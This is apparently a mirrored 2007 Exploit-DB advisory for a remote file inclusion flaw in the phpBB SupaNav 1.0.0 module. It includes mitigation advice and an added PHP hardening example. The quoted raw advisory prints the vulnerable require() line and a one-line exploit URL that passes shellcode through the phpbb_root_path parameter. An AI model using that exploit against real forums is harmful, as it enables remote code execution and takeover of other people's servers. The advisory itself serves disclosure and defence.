Vendor: phpBB Module SupaNav
By: bd0rk
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: phpBB Module SupaNav
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

phpBB Module SupaNav 1.0.0 (link_main.php) Remote File Inclusion Vulnerability

phpBB Module SupaNav 1.0.0 is vulnerable to remote file inclusion in the link_main.php file. The script does not validate the phpbb_root_path parameter before using it in a require() call, which allows an attacker to include arbitrary files from a remote server. By exploiting this vulnerability, an attacker can execute malicious code or gain unauthorized access to the target system.

Mitigation:

To mitigate this vulnerability, update to the latest version of the phpBB Module SupaNav and ensure that the phpbb_root_path parameter is properly validated. Additionally, restrict access to the link_main.php file and keep the application regularly updated and patched.
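
One way to apply this mitigation to the require() in link_main.php, as an added example that is not SupaNav's or phpBB's own code. It assumes link_main.php is only ever included by a phpBB page that defines IN_PHPBB and that it sits in the phpBB root directory; supanav_lang_file() is a hypothetical helper.

```php
<?php
// Added example, not SupaNav's own code. supanav_lang_file() and the
// directory layout are assumptions made for illustration.

// Original (vulnerable) line from link_main.php:
// require($phpbb_root_path.'language/lang_'.$userdata['user_lang'].'/lang_nav.'.$phpEx);

// 1. Refuse direct requests. phpBB 2 pages define IN_PHPBB before they
//    include other files, so a direct hit on link_main.php stops here.
if (!defined('IN_PHPBB')) {
    die('Hacking attempt');
}

// 2. Never take the root path or extension from the request. Assumes
//    link_main.php sits in the phpBB root directory.
$phpbb_root_path = dirname(__FILE__) . '/';
$phpEx = 'php';

// Return the absolute path of lang_nav for $lang, or false when $lang is
// not a plain name or the file does not resolve inside language/.
function supanav_lang_file($root, $lang, $ext)
{
    // Language names are directory names such as "english".
    if (!is_string($lang) || !preg_match('/\A[A-Za-z0-9_]+\z/', $lang)) {
        return false;
    }
    // realpath() returns false unless the path exists on the local disk.
    $base = realpath($root . 'language');
    $file = realpath($root . 'language/lang_' . $lang . '/lang_nav.' . $ext);
    if ($base === false || $file === false) {
        return false;
    }
    // Containment check: the resolved file must live under language/.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($file, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return $file;
}

// 3. Include only a path that passed both checks.
$user_lang = isset($userdata['user_lang']) ? $userdata['user_lang'] : '';
$lang_file = supanav_lang_file($phpbb_root_path, $user_lang, $phpEx);
if ($lang_file === false) {
    die('Language file not available');
}
require($lang_file);
```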
Source

Exploit-DB raw data:

        phpBB Module SupaNav 1.0.0 (link_main.php) Remote File Inclusion Vulnerability


Vendor: http://www.phpbbhacks.com/download/8003

Download: http://www.phpbbhacks.com/load.php?id=8003

Founder: bd0rk

Website 1: www.soh-crew.it.tt

Website 2: www.school-of-hack.net

Contact: bd0rk[at]hackermail.com

ICQ: 249-613-511

Greetings: str0ke, TheJT, rgod, Kacper, GolD_M

Vulnerable Code in link_main.php:

--------------------------------------------------------------------------------------

require($phpbb_root_path.'language/lang_'.$userdata['user_lang'].'/lang_nav.'.$phpEx);

--------------------------------------------------------------------------------------

$phpbb_root_path is not declared before require

[+]Exploit: http://[target]/[directory]/link_main.php?phpbb_root_path=[ShellCode]


####The 18-year-old German hacker bd0rk####

# milw0rm.com [2007-07-18]